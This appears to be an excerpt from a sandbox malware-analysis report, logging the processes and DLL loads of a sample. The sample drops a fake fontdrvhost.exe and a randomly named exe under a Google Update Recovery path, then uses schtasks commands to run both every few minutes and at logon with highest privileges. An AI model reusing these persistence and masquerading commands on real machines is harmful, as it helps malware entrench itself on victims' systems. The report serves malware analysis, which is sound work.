                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                    Source: unknownProcess created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                    Source: unknownProcess created: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe "C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                    Source: unknownProcess created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
                                    Source: unknownProcess created: C:\Drivers\fontdrvhost.exe C:\Drivers\fontdrvhost.exe
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\Drivers\fontdrvhost.exe"
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\/Drivers/fontdrvhost.exe"Jump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Drivers\fontdrvhost.exe "C:\Drivers\fontdrvhost.exe"
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: dxgidebug.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: sfc_os.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: dwmapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: riched20.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: usp10.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: msls31.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: textshaping.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: textinputframework.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: coreuicomponents.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: coremessaging.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\eP6sjvTqJa.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exeSection loaded: userenv.dllJump to behavior
